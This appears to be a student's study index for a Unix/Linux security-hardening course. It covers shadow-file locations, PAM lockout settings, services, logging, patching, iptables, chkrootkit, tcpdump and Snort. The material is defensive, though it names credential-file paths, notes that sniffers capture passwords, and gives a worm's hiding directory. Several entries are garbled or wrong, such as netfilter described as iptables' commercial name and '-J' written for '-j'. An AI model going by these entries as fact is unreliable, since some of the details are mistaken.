id command                               6    49     show effictive username and id, user's groups and their id (primary and secondary groups)
/etc/passwd                              6    50     system users db -->username:x:uid,gid:commnet:homedir:login shell
/etc/shadow                              6   51,53   linux and solaris shadow file name & it contains users encrypted passwd and passwd aging -->username:encrypted passwd:lastchg:min:max:warn:expire:inactive:flag
/etc/seurity/passwd                      6    51     AIX shadow file name
/etc/master.passwd                       6    51     free BSD shadow file name
/tcb/files/auth/r/root                   6    51     HP_UX shadow file names
passwd file fields                       6    52     7 fields
shadow file fields                       6    53     username, passwd, last, may, must, warn, expire, disable, reserved
useradd                                  6    54     add user to the system and it update /etc/passwd, /etc/shadow, /etc/groups file
passwd aging                             6    55     by 2 files /etc/login.defs and /etc/default/useradd
/etc/login.defs                          6    55     PASS_MAX_DAYS-->default:99999days, PASS_MIN_DAYS-->default:0days,PASS_MIN_LEN-->default 0(controlled by PAM),PASS_WARN_AGE-->default 7days
/etc/default/useradd                     6    56     INACTIVE,(no. of days after passwd expiration that account is disable) (default -1 mean disable), EXPIRE
account passwd info display              6    57     chage -l <username>
chage -l            (command)            6    57     account passwd info display
PAM (pluggable authentication modules)   6    58     system libraries that handle linux authentiation it is originally invented by SUN
PAM management groups                    6    58     that handle specific types of authentication requests --> Auth, Password, Session, Account
                                                     in /etc/pam.d and comman pam files format type-->pam management group control-->action if pam auth fail module-path module-argument-->specify name and path of the
PAM config files                         6    58
                                                     module in use (within /lib/security) and what action should be passed into it
/etc/pam.d                               6    58     Directory contain all PAM configuration files and named for the services they are control as /etc/pam.d/su
password enfore stronger (Linux)         6    60     /etc/pam.d/system-auth & use this module: pam_cracklib
pam_cracklib                             6    60     pam module check the passwd against dictionary words to make assessment and other constraint in /etc/pam.d/system_auth
                                                     password enforcing (pam_cracklib argument) and restricting use of previous passwd (pam_unix argument) and loking user account after fail login (pam_tally module)configuration
/etc/pam.d/system_auth                   6    60
                                                     file
minlen=$                                 6    60     minimum length of passwd must be $ in/etc/pam.d/system-auth in pam_cracklib argument
lcredit=$                                6    60     minimum no of lowercase letters is $ in/etc/pam.d/system-auth in pam_cracklib argument
ucredit=$                                6    60     minimum no of uppercase letter is $ in/etc/pam.d/system-auth in pam_cracklib argument
dcredit=$                                6    60     minimum no of digits is $ in/etc/pam.d/system_auth in pam_cracklib argument
ocredit=$                                6    60     min no. of other character is $ in/etc/pam.d/system-auth in pam_cracklib argument
pam_unix                                 6    61     remember old passwd module to restrict use of previous passwd also in /etc/pam.d/sustem-auth
restrict use of previous passwords       6    61     password enforcing (pam_cracklib argument) and restricting use of previous passwd (pam_unix argument) & create /etc/security/opasswd
difok=$                                  6    61     no of character must be diff from old passwd in/etc/pam.d/system-auth in pam_cracklib argument
remember=$                               6    61     this value is the no of old passwd remembered in/etc/pam.d/system-auth in pam_unix argument
/etc/security/opasswd                    6    61     if doesn't exit create it @ restriction use of previous password
pam_tally                                6    62     /etc/pam.d/system-auth it is pam module used to count fail logins
locking useraccount after fail logins    6    62     in /etc/pam.d/system-auth in pam_tally module
No_magic_root                            6    62     in /etc/pam.d/system-auth in pam_tally module tells the system not to lock the root account to prevent DoS against the root account
onerr=fail                               6    62     in /etc/pam.d/system-auth in pam_tally module tell the system what to do when reaching a set no of fail=lock account
per_user                                 6    62     in /etc/pam.d/system-auth in pam_tally module keeps account of each individual use
Deny=$                                   6    62     in /etc/pam.d/system-auth in pam_tally module and it equal the number made before account lock
unlock account (Linux)                   6    62
faillog -u <username>                    6    62     list current no of bad logins with -r with unlock the account, with -m -l will turn off locking on lock out of specific user
faillog -u <username> -r                 6    62     will unlock the account
faillog -u <username> -m -l              6    62     will turn off locking on the lock out of particular user
passwd -l                                6    62     lock account
passwd -u                                6    62     unlock account
usermod -U                               6    62     unlock account
usermod -L                               6    62     lock account
commands to find a compromised system    6    63     ps , netstat , dd
ps (process status)                      6   64,65   ps command and it is detection control
%CPU                                     6    65     ps output and it is percentage of cpu process is using
%MEM                                     6    65     ps output and it is percent of memory process is used
VSZ                                      6    65     ps output and it is process size
STAT                                     6    65     ps output and it is current process status
TIME                                     6    65     ps output and it is tilme the process start running
netstat                              6     67     summerize tcp/ip network traffic, -a --> all the service or ports acive, -n --> display in numeric format ( show IPs)
dd                                   6     68     backup command dd if=<Input-file> of=<output-file> , and it is offer no security prevention
dd                                   6     68     backup (bit-by-bit image), reduce backup time, can be conducted through: Locally, Via Scripts, Over the Network
service started how?                 6     73     1-at boot time, 2-automatic by init or rc scripts which use inetd/xinetd(on demand services), 3- cron scheduler (crontab), 4-command line
init process                         6     74     after kernel loading it is a program provide layer between kernel and user, is starts when the compouter boots and continues till the system shutdown.
init styles                          6     74     sysV (as in debian/ubuntu and redhat/fedora), and BSD (as in free BSD and other BSD distributions)
/etc/inittab                         6     74     list each of the init processes the system should start at boot and stop at shut down have 4 fields id:runlevel:action:full pathof the binary
getty service                        6     74     allow users to begin logging into the system
inetd                                6     76     super server daemon responsible for starting network services when there is a request (not at boot as init) service must be listed in 2 files (/etc/inetd.conf,/etc/services)
/etc/inetd.conf                      6     76     config. File for inetd connect name of services to names of servers as tcp with /usr/sbin/tcpd.in.telnetd
/etc/services                        6     76     connect port numbers to protocols, have a list for all services telnet 23/tcp
xinetd                               6     77     eXtended InterNET service daemon, more security features than inetd, & replace it
xinetd                               6     77     (perform access control, help prevent DOS attacks, log all snort info, bind IP address to service) & can start service that not listed in /etc/services
xinetd access control                6     77     can be done by ip, domain, hostname, time of access
xinetd prevent DOS                   6     77     limit no of conn any host can make, how many incoming request will be answered at atime, kill service if limits exceeds so it is protect against DOS and portscan
xinetd network filter                6     78     admin can bind a specific service to specific ip
cron                                 6     79     schedule daemon(crond), start an action(in the background)at present time, /etc/crontab --> crontab file in user home dir(for users)
/etc/crontab                         6     79     min(0-59), hour(0-23), day of month(1-31), month(1-12), day of week (0 or 7 is sun) runas(this field for debian) command path
system boot                          6     81     how UNIX system boots: 1- bootloader, 2-kernel , 3-init, 4-startup script
boot loader                          6     81     prepare the system to begin kernel, have 2 stages ( 1- MBR, 2- loader program that actually run unix kernel)
MBR function                         6     81     usually runs a more complex boot loader from elsewhere on the system disk like: GRUB (Linux), openboot (Unix)
kernel                               6     82     software repsonsile for (initialize & manage HW resources, handle communication between app and HW devices)
init process                         6     83     startup some initial system processes that allow other processes to be run, these processes manage system as: virtual memory system and process scheduler
start-up scripts/run level scripts   6     84     it is run by init and it is run one or more start-up scripts (run level scripts), which actually start programs and services that most users interact
boot loader password                 6     85     adv: must have physical access, disadv: also physical access (if power outage or system reboot )
lilo.conf                            6     85     one type of boot loader, add 2 lines at the top of the file to make passwd to boot loader (password=<your password>, then restricted)
grub.conf                            6     85     one type of boot loader, add one line at top of the file to make a password to boot loader (password --md5 <md5hash>)
run levels                           6    86,87   init selects which set of scripts to run based on run level, run level is defined in /etc/inittab file, each unix system has it's own run levels
                                                  define the run levels, and is divided into: 1st section (passes default run level), 2nd contain (location of the script to be run before all others ), 3rd (locate all run condition dir on
inittab                              6     88
                                                  the system ) as when alt-ctl-del press, UPS poweroff , no of tty started
run condition (level) dir            6     89     /etc/rcX.d, normally there's one directory for each run condition, file starts with S or K
/etc/rcX.d                           6     89     run (condition) level dir, normally there's one directory for each run condition, , file starts with S or K
/etc/init.d                          6     90     to control scripts (/etc/init.d/abc start|stop|restart), service not actually in rc directory, the rc dir just has link to each service that is in /etc/init.d

service management                   6    91,92   if you don't need service turn it off, update and patch all services running or not to: 1- prevent local exploits by un privileged users, 2-to be patched incase to re-enabling it

service command                      6     93    service <servicename> [start|stop|restart] , service --status-all -->get status of all services.
chkconfig command                    6     94    provides an overview of what services are started & what started @ each run level, chkconfig --list, chkconfig --level <#> <servicename> <on|off>
common services                      6     95    file sharing (nfs,samba), naming (dns, nis/nis+), rpc (portmapper), internet (web,email)
file sharing                         6     95    NFS, samba
NFS (Network file System)            6     96    provide transperent file access for clients with files and filesystems on a "server A", file sharing implement as rpc service UDP port 2049
NFS client                           6     97    mount <serverip>:<sharename> <mountpoint>, any attempt to look in mount point it will cause rpc to the server and display content from the server
                                                 software run on unix/linux allow host to interact with windows client or server as if it were a windows file and print server, this interaction is like connect or disconnect of
samba                                6     99
                                                 directory mapping and printer sharing on Microsoft Systems, using SMB protocol [unix implementation of SMB]
DNS basic                            6     100 when user need to lock up for FQDN, the system request the info from predefined DNS server, DNS save cache normally for 24hrs.
                                                 client-server model(provide central admin control of user account through network), server contain data files called maps, client request info from maps, master server have true
NIS (Network Information Service)    6     101
                                                 data file which must be rebuilt and redistributed if changed.
NIS+                                 6     101 is like NIS, but provide more security.
RPC (remote Procedure Call)          6   102,103 clinet-server based and it is setup so that the client calls functions in the server program
RPCSec                               6     102 is the secure version of RPC
                                                 when rpc start on a computer it register with portmapper service so portmapper tarck all all rpc running on the system use UDP port 111 and TCP port 111, it's a registrar keeps
port Mapper                          6     104
                                                 track of which rpc program are using which ports

port Mapper                          6     104    services register with the PortMapper and clients query it, PortMapper can provide info on all of these RPCs to remote computers that desire their sevice
LOCKD                                        6     105     rpc service run by both clinet and server, it handle file lock
STATD                                        6     105     rpc service run by client and server ,this service handle status of file lock
AUTOMOUNTD                                   6     105     rpc service mount and umount NFS resources only when needed
RSH                                          6     105     rpc service allow a user to get a remote shell
RCMD and REXD                                6     105     rpc service allow execution of program or part of program remotely
REXD and RCMD                                6     105     rpc service allow execution of program or part of program remotely
inetd                                        6     106     Internet service Daemon "Super Server" used to manage most of tcp/ip daemons
xinetd                                       6     106     config file in /etc/xinetd.conf /etc/xinetd.d
inetd - examples from /etc/inetd.conf file   6     107
service name- Linux                          6     107   all services are defined at /etc/services
                                                         it's field: service name socket type(stream,dgram,sunrpc_tcp,sunrpc_udp) protocol name (TCP|UDP or any protocol in /etc/protocol) wait (for stream or dgram)|nowait(for
/etc/inetd.conf                              6   108,109
                                                         dgram) server path server args (max no is five), any line start with # is a comment
protocol - Linux                             6     107 any protocol in /etc/protocol
                                                         built in control mechanism as TCP Wrapper ACL, more logging option,built in support for warning banner, resource thresholds, redirect the service to services on other ports or
xinetd                                       6     109
                                                         other systems
/etc/xinetd.conf                             6     110 the global xinetd configuartion file, read once when xinetd service is started, some defaults in it (instances, logtype, log_on_success, log_on_fail, cps)
/etc/xinetd.d dir                            6     111 Directory containing all service-specific files, dir contain config file of each service managed by xinetd , these files is read only when xinetd started
                                                         is simply a utility that can be used for logging and intercepting TCP and UDP services startedby inetd or xined , host-base network ACL system, used to filter network access to
tcpwrapper                                   6   113,114
                                                         Internet Protocol on UNIX systems, can place banner on any tcp or udp service
tcpwrapper                                   6     114 acts as a proxy between the client and the real service connection, can mointor & filter SYSTAT, Finger, FTP, Telnet, Rlogin, Rsh, TFTP, Talk and …
tcpwrapper - Before it ?                     6     115 without host based firewall or ACL, access to service is a direct connection
tcpwrapper - After it ?                      6     116     with tcpwrapper installed (as tcpd ),all connection mush pass thru a set of rules before being allowed to connect to the service, checked at /etc/hosts.allow, /etc/hosts.deny
trcpwrapper                                  6     117     can also perform double-reverse ip address lookup, bannering system, additional logging capabilities
trcpwrapper                                  6     118     can alert the network admin of suspicious activity by sending SMS or Mail to the Admin
log files                                    6     122     Binary Log Files (utmp,wtmp,lastlog), Text Log Files (history files, sulog, httpd, syslogd, messanges/syslog, secure, ftplog, maillog)
                                                           binary log file keep track of logins and logouts, shutdowns and reboot ( track intruder activities), similar to UTMP but grow in length and keep historical data; because it binary file
wtmp log                                     6     123
                                                           it's used by last command (/var/log/wtmp), more info than lastlog
last command                                 6     124     use wtmp log, it's output is: ( userID, terminal ID, remote host ID, connection date, time on, time off, session time), & it read in the reverse order.
utmp log                                     6     125     binary log file, keeps track of users currently looged, used by (w, finger, who) commands, updated by login program, world writeable so it is inaccurate /var/run/utmp
finger command                               6     125     used to display the UTMP log file.
who command                                  6     125     used to display the UTMP log file.
w command                                    6     126     use utmp log file, it's output is: ( user, TTY, FROM, LOGIN@, IDLE, JCPU, PCPU, WHAT )
lastlog                                      6     127     binary log file, keep track of user last most recent log in date & time, record initiating ip add, display each time the login program is run
sulog                                        6     128     record the usage of su command, used by hackers to switch to usernames that have rlogin to other machines or su to have root access, found in solaris and irix, /var/adm/sulog
/var/adm/sulog file                          6     129   file fields: activity (always su) date time +/-(un/successful) terminal starting user ending user
                                                         most web server maintain logs which track the originating ip address of each connection. File entries: originating_IP notused username date&time Actual_text_of_the_request
http logs                                    6   130,131
                                                         error code (200 ok, 404 file not found) no_of_bytes_returned_to_the_browser
                                                         log major events, as su to root and failed login attemps, may need rool level to view logs generated by syslogd it's path /var/log/messages, solaris -->/var/adm/messages, Iris --
syslog (messages)                            6     132
                                                         >/var/adm/SYSLOG, HP-UX --> /usr/adm/syslog
syslog file fields ( messages)               6     133 date time hostname originating_program_name : msg_sent_to_syslogd
syslogd                                      6   134,135 daemon that accept incomming log msgs and deal with them according the rules found in /etc/syslog.conf
syslogd                                      6     134 any programe which wants to generate log messages may do so through calls to the syslog interface.
/etc/syslog.conf                             6     136 selector (facilities, level of priority)             action
/etc/syslog.conf facilities                  6     137 facility: specifies how the msg was produced as (auth,cron,authpriv,daemon,kern,lpr,mail,news,syslog,user,local0-local6)
/etc/syslog.conf levels                      6     138 priority level (emerg, alert, crit, err, warning, notice, info, debug, none) * --> mean all
/etc/syslog.conf actions                     6     139 how messages should be handle ( file,terminal,remote host,user,fifo file)
                                                         WU-FTP track incoming connections , solaris ,IRIX and others variants typically log only ftp conn. Put logs in syslog file: ( date time hostname program name : msg sent to
ftp logs                                     6     140
                                                         syslogd)
ftp logs                                     6     140 Notice: only the FTP connection only is logged, not what files were uploaded or downloaded.
xferlog                                      6     140 /var/log/xferlog, ftp logs
/var/adm/SYSLOG                              6     132 IRIX syslog file (date time hostname program name : msg sent to syslogd)
/var/adm/messages                            6     132 solaris syslog file (date time hostname program name : msg sent to syslogd)
/var/adm/syslog                              6     132 HP-UX syslog files (date time hostname program name : msg sent to syslogd)
SGI machine                                  6     141 IRIX unix
/etc/inetd.conf                                       6     142     we can improve ftp logging by adding -1 in ftp line then restart inetd ( it will log also what the user made in ftp conn. As get, mkdir, ...)
                                                                    maillog sent it's log to syslogd, ( date time hostname program_name : msg_sent_to_syslogd) --> first filed in msg is queue id (if multiple entry for msg each will be assiciated
maillog                                               6   144,145
                                                                    with same id)
maillog - queue identification number                 6     145     id no assigned to the msg, appear in msg id of the mail in mail header
                                                                    The logrotate program is a log file manager. It is used to regularly cycle (or rotate) log files by removing the oldest ones from your system and creating new log files. It may be
logrotate                                             6     147     used to rotate based on the age of the file or the file’s size, and usually runs automatically through the cron utility. The logrotate program may also be used to compress log files
                                                                    and to configure e-mail to users when they are rotated.
                                                                    The options entered in /etc/logrotate.conf may be used to set configuration parameters for any log file on the system. (compress,daily,weekly,monthly,size,rotate
/etc/logrotate.conf                                   6     147
                                                                    n,missingok,create)
/etc/logrotate.d                                      6     147     directory contain all the logrotate config. Files
                                                                    The include option allows the administrator to take log file rotation information, which may be installed in several files, and use it in the main configuration file. When logrotate
/etc/logrotate.conf - include option                  6     147
                                                                    finds the include option on a line in logrotate.conf , the information in the file specified is read as if it appeared in /etc/logrotate.conf .
/etc/logrotate.conf - weekly option                   6     147     This is used to rotate log files weekly
/etc/logrotate.conf - monthly option                  6     147     This is used to rotate log files monthly
/etc/logrotate.conf - daily option                    6     147     This is used to rotate log files daily.
/etc/logrotate.conf - size option                     6     147     the log file is rotated when the specified size is reached. Size may be specified in bytes (default), kilobytes (sizek ), or megabytes (sizem ).
/etc/logrotate.conf - rotate option                   6     147     This specifies the number of times to rotate a file before it is deleted. A count of 0 (zero) means no copies are retained. A count of 5 means five copies are retained.

/etc/logrotate.conf - create option                   6     147     This rotates the log file and creates a new log file with the specified permissions, owner, and group. The default is to use the same mode, owner, and group as the original file.
/etc/logrotate.conf - missingok option                6     147     tells the logrotate to continue to the next file if the file doesn't exist rather than quit with an error
                                                                    onfiguration parameters for a specific file are often required. A common example would be to include a section in the /etc/logrotate.conf file to rotate the /var/log/wtmp file once
/etc/logrotate.conf directive {}                      6     148
                                                                    per month and keep only one copy of the log. When configuration is required for a specific file, the following format is used: filename { options}
/etc/logrotate.conf prerotate                         6     149     write command specifies actions to be taken prior to the file being rotated by logrotate .
/etc/logrotate.conf postrotate                        6     149     specifies the following commands are to be run on log file after the file has been rotated by logrotate .
/etc/logrotate.conf endscript                         6     149     command marks the end of the prerotate or postrotate portion of this script.
/etc/logrotate.conf sharedscripts                     6     149
logrotate use it instead of /etc/cron.daily/syslogd   6     149
/etc/logrotate.conf error address option              6     net     This mails logrotate errors to an address.
                                                                    protect from log deletion, DoS possibility (so we need to determine specific machines and use firewall), need lot of disks, one machine holds lots of info ( use ssh with limited
centralized logging                                   6     151
                                                                    logins and IPs), easy to search and scan (generate single reports)
logwatch                                              6     152     log alert program
logsurfer                                             6     152     log alert program
swatch                                                6     152     log alert program
                                                                    syslog next generation replace to syslog (can't reuse syslog.conf), additional filtering (filter by hostname and actual text of log msg using regular expression), send data with tcp,
syslog-NG "next generation"                           6     153
                                                                    can support windows, not installed by default
syslog-NG installation                                6     153     yum install syslog-ng , install it in fedora
syslog-NG - switch from syslog to it                  6     153     chkconfig --del syslog then chkconfig --add syslog-ng then stop syslog daemon and start syslog-ng daemon
syslog-NG config file                                 6     153     /etc/syslog-ng and uses same facility and periority as the default syslog daemon
syslog-NG filter                                      6   153,154 create destination(file) then create a filter based of facility,priority,hostname and presence or absence of string then it create log rule based on filters and destination
syslog-NG - drawback                                  6     154     complex in configuration.
syslog-NG over tcp                                    6     154     verify date so that it is guaranteed to make log to remote host,use encryption with stunnel
patching - why ?                                      6     158     1-Everyday new vulnerabilities, 2- Vendors releasing patching to fix these vulnerabilities, 3-un-patched systems are still major reason for compromised systems.
                                                                    1- app may stop or have unexpected behavior so test patch first on non product system, 2-some patches need reboot, Test patches on Non-production systems before distribute
patch -new patches impact ?                           6     159
                                                                    the patches widely
patches - how to find new patches                     6     160     1-Automated updates, 2-Vendor Web/FTP site, 3-Mail List
automatic update                                      6     160     not good to be used on production system, (by yum or up2date "Redhat update agent" or synapt "apt")
up2date                                               6     160     automatioc update tool ( redhat update agent)
apt                                                   6     161     Advanced Package Tool, update tool for debian-based linux as knoppix and ubuntu, packages with .deb extention
apt-get                                               6     161     store a DB of ur version & then contact the website to tell u the differences, it'll also tell u about the dependencies but won't install them.
apt-get update                                        6     161     update local DB of available package
apt-show-versions -u                                  6     161     check and see which packages need updating
apt-get upgrade                                       6     161     download and install upgrades
apt-show-versions -a pkgname                  6     162     show all available versions of a given package
apt-get install pkgname                       6     162     install new pkg
apt-get remove pkgname                        6     162     remove pkg
rpm                                           6     163     package manager solution for redhat linux
rpm -i pkg                                    6     163     install package
rpm -U pkg                                    6     163     upgrade pkg ( if pkg not installed, install it)
rpm -F pkg                                    6     163     freshen pkg( update installed packages)
rpm -q pkg                                    6     164     query to see if pkg is install or error if pkg isn't install
rpm -initdb                                   6     164     create new rpm header db
rpm -rebuilddb                                6     164     update/rebuild the rpm header db
yum install pkgname                           6     165     to install pkg with yum
yum check-update                              6     165     give list of what needs to be updated ( look for patches ( aka update sowtware))
yum update                                    6     165     download the updates and install them( and it may take a lot of bandwidth and time)
yum                                           6     166     GUI tools use rpm to install,upgrade,remove pkg (redhat & fedora)
up2date                                       6     166     GUI tools use rpm to install,upgrade,remove pkg (redhat & fedora)
synaptic                                      6     166     synaptic/AWinApt GUI tools use apt to install,upgrade,remove pkg (debian)
QWinApt                                       6     166     synaptic/QWinAPT GUI tools use apt to install,upgrade,remove pkg (debian)
solaris pkg manager                           6     167     pkgadd,pkgrm,pkgchk
HP-UX pkg manager                             6     167     swinstall,swremove,swverify
BSD pkg manager                               6     167     pkg_add,pkg_delete
                                                            intrusion detection through integrity checking, have 2 versions: (commercial & open source), create secure db of file and dir attribute, can include MD5 signature for data
tripwire                                      6     171
                                                            verification
tripwire portable db                          6     171     tripwire create digital snapshot of file and/or dir and places,db should maintained off-site and secure
tripwire log file attribute                   6     172     access time,mod.time,size,inode creation time,content
tripwire perm and file mode attr              6     172     inode,no of links,user,group
tripwire steps                                6     173
tripwire -mi -v                               6     173     run tripwire in init phase ( create db) with verbose output
tripwire -mc -v                               6     173     run tripwire in check phase with verbose output
twprint -mr --twfile filename                 6     173     read tripwire report
ipfwadm                                       6     174     old builtin firewall
ipchains                                      6     175     old builtin firewall
                                                            current packet filtering, it is modular ( can check packets that is not part of iptables by add new test to kernel without reboot and define action to take ,fast), & can work as a NAT
iptables                                      6     175
                                                            Box.

netfilter                                     6     175     is the commercial name of Iptables

iptables downside                             6     175   focus on packet headers only
linux proxy applications                      6     175   squid (Web and FTP), bind (for DNS), postfix (for e-mail). & can coexist with Iptables
squid                                         6     175   is a Linux proxy application used for Web & FTP, & can coexist with Iptables.
bind                                          6     175   is a Linux proxy application used for DNS, & can coexist with Iptables.
postfix                                       6     175   is a Linux proxy application used for e-mail, & can coexist with Iptables.
iptables basics                               6     176   iptables cmd tells kernel what to check and kernel does the actual check (from top of rules list to down ) and if find one match make the action
iptables {checks} {action} command            6     176   perform this action if the packet matches all checks else continue to next rule so it built up the kernel table
                                                          FORWARD --> filter packets to server accessible by another NIC on the firewall(going throughthe system), INPUT-->filter packets destined to firewall(coming into the system),
iptables -I FORWARD|INPUT|OUTPUT              6   177,179
                                                          OUTPUT --> filter packets originating from the firewall(created by the system)
                                                          two built-in chains to place a NAT policy rules: Pre-routing chain --> NATs packets when the dest. Address of packet needs to be changed, Post-routing chain --> NATs packets
iptables- NAT                                 6     178
                                                          when the source Address of packet needs to be changed
iptables -s (or --sourse) ip or ip/mask       6     176 source address ip or network (used to block attacker)
iptables -d (or --destination)ip or ip/mask   6     176 destination ip or network
iptables -J DROP|ACCEPT|REJECT|LOG            6   176,181 action done( ACCEPT --> accept packet,REJECT -->reject packet and notify the sender,DROP-->silent ignore the packet,LOG -->log the packet and continue process more rules
iptables -p tcp                               6     176     protocol used
iptables -sport                               6     182     source port ( single port or port range as start:end )
iptables -dport                               6   176,180   destination port ( single port or port range as start:end )
nat                                           6     178     2 builtin chains in which to place nat policy rules: pre-routing chain,post-routing chain
pre-routing chain                             6     178     NATs packets when distination address of the packet needs to be changed
post-routing chain                            6     178     NATs packets when the source address of the packet needs to be changed
iptables -I FORWARD|INPUT|OUTPUT         6   179,181   iptables -I insert at the top of the current rule list, iptables -I chain ruleno( put this in specific chain and make it no x)
iptables -D                              6     179     user same command with -I option to delete rule
iptables -L -nxv |less -S                6     179     to see the active firewall rules (-L list the current filter rules)
firewall rules (chain)                   6     179     FORWORD,INPUT,OUTPUT
iptables -A INPUT …                      6     180     append this rule to a rule chain (put it on the bottom)
iptables --state                         6     180     define list of states for the rules to match on (NEW,RELATED,ESTABLISHED,INVALID)
iptables -m state                        6     180     allow filter rule based on connection state, premit the use of --state option
iptables --limit                         6     180     the max. matching rate given as number followed by (/second,/minute,/hour), if this option isn't used & -m limit is used -->the default is 3 hours
iptables -m limit                        6     180     require the rule to match only a limited no of times ( useful for limitation logging rule), premit the use of --limit option
iptables -j LOG                          6     180     log the packet, and continue processing more rules in this chain, Allows the use of --log-prefix & --log-level
iptables --log-prefix "text"             6     181     when logging, put this text before the log msg
iptables --log-level                     6     181     log using specific log level,7 is good choice
iptables -i                              6     181     only match if packet come from specific interface
iptables -v                              6     181     display more info (useful if u have look similar rules)
iptables -o (--out-interface)            6     181     outname+network interface name (+is wild card)
MS-SQL udp port 1434                     6     182
iptables -p udp -I forword -dport 1434   6     182     to block worm traffic
block worm traffic                       6     182
                                                       free malware scanning tool for the various unix (act as a warning system for well known malware but doesn't give much details, it doesn't offer u any removal capability if the
chkrootkit                               6    184
                                                       system is infected), if u will use it frequently in a Cron schedule as an example, it's better to run it in "quiet mode" (chkroot -q) to show only potential problems.
chkrootkit                               6    184      looks for rootkits, sniffers, deleted logs, trojans, kernel modules
ramen worm                               6    185      save it's code in /usr/src/.poop on the infected linux
/usr/src/.poop                           6    185      ramen worm save it's code in that directory on infected linux
chkrootkit command                       6    184      for first time it will tell u what it's checking for and what it's found and not found
chkrootkit -q                            6    184      work in quiet mode where only show potential problems
chkrootkit -x                            6    185      telling u what it found in expert mode
                                                       provide what is closer to antivirus packages in windows, they update signature db daily, current release have signatures for potentially unwanted app (but it's not enabled by
clamav                                   6    186
                                                       default)
sourcefire                               6    186      provide commercial support for clamav and it sells snort app and support
clamav installation                      6    186      "yum install clamav", it will automatically install the clamav-db package as well and this package contains the initial signature db, which will be updates nightly
clamav-db                                6    186      installed automatically with clamav and contains the initial signature db
clamscan -r dir                          6    186      to actually scan files
clamscan --detect-pua                    6    186      to enable "Detect Possibly Unwanted Applications", it's not enabled by Default.
clamscan --remove                        6    186      remove known malware
CIS hardening guide                      6    187      CIS comes up with the steps they think should be followed in securing that platform
hardening tools                          6    187      that will make some or all of the recommended changes to make ur platform secure, free tools
scoring tools                            6    187      program that rate ur system on how secure is (no don't have a direct meaning but it does allow a relative cmparison between systems), free tool
redhat benchmark                         6    188      require sun java runtime env.(specialy version 1.5(5.0)),don't get anything older or newer
CIS benchmark report                     6    188      final score not absolute no., but it's compared to other CIS benchmark scored system
                                                       hardening program report on how secure system is and show security issues( educates admin),why it should be fixed and what side effect the fix might have also can optionally fix
Bastille linux                           6    189
                                                       issues (changes can be reverted) it run on (linux,HP-UX,mac osx)
sniffers                                 6    190      copy packets from network cable ( need to be run as root), Display summary of important header & save them to disk for later reporcessing
specialized sniffer                      6    190      captur passwords, looking for attacks, ithem in some form can listen to raw packets flying by a network cable and show them or analyze t
sniffer tools                            6    190      if packets are not flowing correctly or there are network problem to diagnose
                                                       it is one of the earliest sniffers, work on any OS talk tcp/ip, simple packet header analysis, can decode a few protocols as NFS and DNS and show raw payload, filter and restrict
tcpdump                                  6    191
                                                       what to view
windump                                  6    191      tcpdump for windows
tcpdump cmd                              6    191      give one line per packet summary of each packet
tcpdump -X                               6    191      see the packet payload and you'll get the hexadecimal and mostly readable payload content
tcpdump -w [filename]                    6    191      save the packets that tcpdump capture to disk
tcpdump -r [.pcapfile]                   6    191      ignore ur network interface and read packets from saved capture file
tcpdump -nn                              6    191      not convert protocol and port numbers etc. to names either
tcpdump ' tcp and port 1737'             6    191      make tcpdump with filter (put filter in single quote at the end of tcpdump command line)
tcpdump -nnp                             6    191      tcpdump -p Don't put the interface into promiscuous mode
tcpdump -ilo                             6    192      listen to loopback interface ( which is face network interface)
tcpdump -n                                        6   192   not make any dns lookup
tcpdump -v                                        6   192   verbose mode so you can see the low level negotiation through more details of the packet
                                                            timestamp, ethernet packet type(ip), source ip address.sourceport, destination ip.destination port, flags other than ack ("."), acknowledgement number,window size and tcp
tcpdump fields                                    6   192
                                                            optios( between < >)
tcpdump                                           6   192   can't decode the applications layer prtocols except: DNS, NFS
ethereal wireshark                                6   193   bring sniffing and packet analysis to a new level,first GUI( need to run X window) --> wireshark & or from application menu then internet then network analyzer
wireshark &                                       6   193   to run the wireshark in the background to be able to use the shell again.
                                                            let you maneuver around packets and headers, it also knows a great deal about the app layer protocols, it have the ability to decode the actual conversation and show you an
wireshark GUI benefits                            6   193
                                                            app layer sumary, it provide tools to analyze the packets
                                                            it can extract just the tcp application layer conversations, it can give packet counts by the ip endpoints and it can show Cisco IOS rules that would allow or block this traffic, you
wireshark extracts                                6   193
                                                            also can set advenced filters to only look for particular conversation or traffic type
                                                            if you need to capture and decode the app. Layer but don't have access to graphical display, it display one-line-per-packet as tcpdump but it gives app layer decode that
tshark -i{interface}                              6   193
                                                            tcpdump generally won't
wireshark session                                 6   194   go to capture menu and choose interfaces and pick any interface then press start
                                                            return to main window with packets summarized in the top third when you click on any summaryline , the protocol header of that packet show up in the middle window .the
wireshark stop                                    6   194
                                                            hexdecode of the packet show up in the buttom window
                                                            to see app layer conversation without header click on tcp port 25 packet in the top window and choose" follow tcp stream" in the analyze menu. Anew popup with the smtp
wireshark analyze tool                            6   194
                                                            conversation ( lines from server to client are blue and from client to server are red)
                                                            starts as testing tool for a honey pot systems software, intrusion detection system ( run on any thing), it's a powerfull sniffer application, free and commertial versions , strong
snort                                             6   195
                                                            and supplied ruleset, user can add their own rules
snort uses                                        6   196   run in the foreground as an IDS
snort -v                                          6   196   snort in verbose mode, it print m ulti line summary of each attack
snort -d                                          6   196   print the application layer as well as the default header
snort -e                                          6   196   show the ethernet mac address or link address for ur cable type
snort -i{interface}                               6   196   tell snort to sniff on that interface
snort - to see its output                         6   196   to actually elicit some alerts, we will tell nmap to probe for open services on a remote machine in a different terminal window, the port scan will show up in snort console
                                                            snort will do the same job on these platform since it is compiled from the same source code but in linux performance will be better, widnows system start to drop packets as no of
snort diff between linux & windows                6   197
                                                            packets and attacks per second go up,
IDS load balancer                                 6   197   to distribute the packets on your network tp multiple identical IDS's, if you've tuned your IDS for speed and the system still can't kee up
route -n                                          6   197   list the networks with a live route
windump -D                                        6   197   to list long interface names and shorthand number this number can be used after -i
snort operating modes                             6   198   snort as sniffer, snort as packet logger, snort as IDS
snort as sniffer                                  6   198   it show packet to the screen run it as snort -vd -i lo
snort -vd -i lo                                   6   198   snort as sniffer
snort as a packet logger                          6   198   1- make log dir, 2- snort -vd -l /root/log -i lo , a summary of the packets is kept in the directory tree under one of the ip address in the packets
snort -vd -l /root/log -i lo                      6   198   snort as packet logger
snort -h                                          6   198   snort -h="home net", tell snort which address is local and the other is used as the packet directory
snort as IDS                                      6   198   snort -vd -l /root/log -c /etc/snort.conf -i lo
snort -vd -l /root/log -c /etc/snort.conf -i lo   6   198   snort as FULL IDS this configuration file tell snort which attacks to look for
boot loader password                              6   199   enable additional security validation
ps                                                6   199   monitor you running processes
netstat                                           6   199   identify running services and connections to each
